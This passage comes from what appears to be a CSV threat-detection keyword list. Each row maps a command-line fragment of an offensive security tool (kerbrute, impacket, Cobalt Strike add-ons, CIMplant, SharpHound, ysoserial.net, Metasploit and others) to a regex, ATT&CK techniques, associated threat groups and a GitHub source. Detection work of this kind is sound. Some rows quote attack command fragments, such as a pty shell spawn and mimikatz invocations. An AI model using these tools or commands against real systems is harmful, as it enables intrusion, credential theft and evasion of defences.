That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","471" "* bruteuser *",".{0,1000}\sbruteuser\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","472" "* bruteuser -d *",".{0,1000}\sbruteuser\s\-d\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","473" "* -brute-uuids *",".{0,1000}\s\-brute\-uuids\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","474" "* build Dent.go*",".{0,1000}\sbuild\sDent\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","N/A","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","475" "* -Build -NoAttackPaths*",".{0,1000}\s\-Build\s\-NoAttackPaths.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","476" "* build_arsenal_kit.sh*",".{0,1000}\sbuild_arsenal_kit\.sh.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","477" "* build_letmeout*",".{0,1000}\sbuild_letmeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","478" "* by @citronneur (v*",".{0,1000}\sby\s\@citronneur\s\(v.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","479" "* by @JoelGMSec *",".{0,1000}\sby\s\@JoelGMSec\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","480" "* By Alcatraz3222.exe*",".{0,1000}\sBy\sAlcatraz3222\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","481" "* by erwan2212@gmail.com*",".{0,1000}\sby\serwan2212\@gmail\.com.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","482" "* by Flangvik & Jean_Maes_1994*",".{0,1000}\sby\sFlangvik\s\&\sJean_Maes_1994.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","483" "* --bypass --stealth --antisandox*",".{0,1000}\s\-\-bypass\s\-\-stealth\s\-\-antisandox.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","484" "* BypassCredGuard.exe*",".{0,1000}\sBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","485" "* BypassFramework.py*",".{0,1000}\sBypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","486" "* BypassUac*.bat*",".{0,1000}\sBypassUac.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","487" "* BypassUac*.dll*",".{0,1000}\sBypassUac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","488" "* BypassUac*.exe*",".{0,1000}\sBypassUac.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","489" "* -c ""!mimikatz"" *",".{0,1000}\s\-c\s\""!mimikatz\""\s.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","490" "* -c * --choose-mutators * -s 
1*",".{0,1000}\s\-c\s.{0,1000}\s\-\-choose\-mutators\s.{0,1000}\s\-s\s1.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","491" "* -c * -o payload.ser*",".{0,1000}\s\-c\s.{0,1000}\s\-o\spayload\.ser.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","492" "* -c * -s * -o share_listing -m 150*",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-o\sshare_listing\s\-m\s150.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","493" "* -c * -s * --proxy * --proxyu * --proxyp * --reconnect *",".{0,1000}\s\-c\s.{0,1000}\s\-s\s.{0,1000}\s\-\-proxy\s.{0,1000}\s\-\-proxyu\s.{0,1000}\s\-\-proxyp\s.{0,1000}\s\-\-reconnect\s.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","494" "* -c *ExploitClass.cs*System.dll*",".{0,1000}\s\-c\s.{0,1000}ExploitClass\.cs.{0,1000}System\.dll.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","495" "* -c *OBFUSCATION=*.ps1*",".{0,1000}\s\-c\s.{0,1000}OBFUSCATION\=.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","496" "* -c '/accepteula /s calc.exe' -e PsExec64.exe*",".{0,1000}\s\-c\s\'\/accepteula\s\/s\scalc\.exe\'\s\-e\sPsExec64\.exe.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pywsus","1","0","N/A","network exploitation tool","N/A","4","303","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z","497" "* -c active_users -u *",".{0,1000}\s\-c\sactive_users\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","498" "* -c all -d * --domaincontroller *",".{0,1000}\s\-c\sall\s\-d\s.{0,1000}\s\-\-domaincontroller\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","499" "* -c command_exec --execute tasklist*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\stasklist.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","500" "* -c command_exec --execute 
whoami*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\swhoami.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","501" "* -c CredEnum.c*",".{0,1000}\s\-c\sCredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/guervild/BOFs","1","0","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","502" "* -c DCOnly -d * -u * -p * -o /tmp*",".{0,1000}\s\-c\sDCOnly\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-o\s\/tmp.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","503" "* -c edr_query *",".{0,1000}\s\-c\sedr_query\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","504" "* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","risk of False positive","4","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","506" "* -c logon_events * -u *",".{0,1000}\s\-c\slogon_events\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","509" "* -c ls --directory * -u * -p *",".{0,1000}\s\-c\sls\s\-\-directory\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","510" "* -c process_kill --process *",".{0,1000}\s\-c\sprocess_kill\s\-\-process\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","511" "* -c 
service_mod --execute create -s *",".{0,1000}\s\-c\sservice_mod\s\-\-execute\screate\s\-s\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","513" "* -c upload --fileto * --file *",".{0,1000}\s\-c\supload\s\-\-fileto\s.{0,1000}\s\-\-file\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","514" "* -c vacant_system * -u *",".{0,1000}\s\-c\svacant_system\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","515" "* -c -w methods.txt -p 127.0.0.1*",".{0,1000}\s\-c\s\-w\smethods\.txt\s\-p\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - 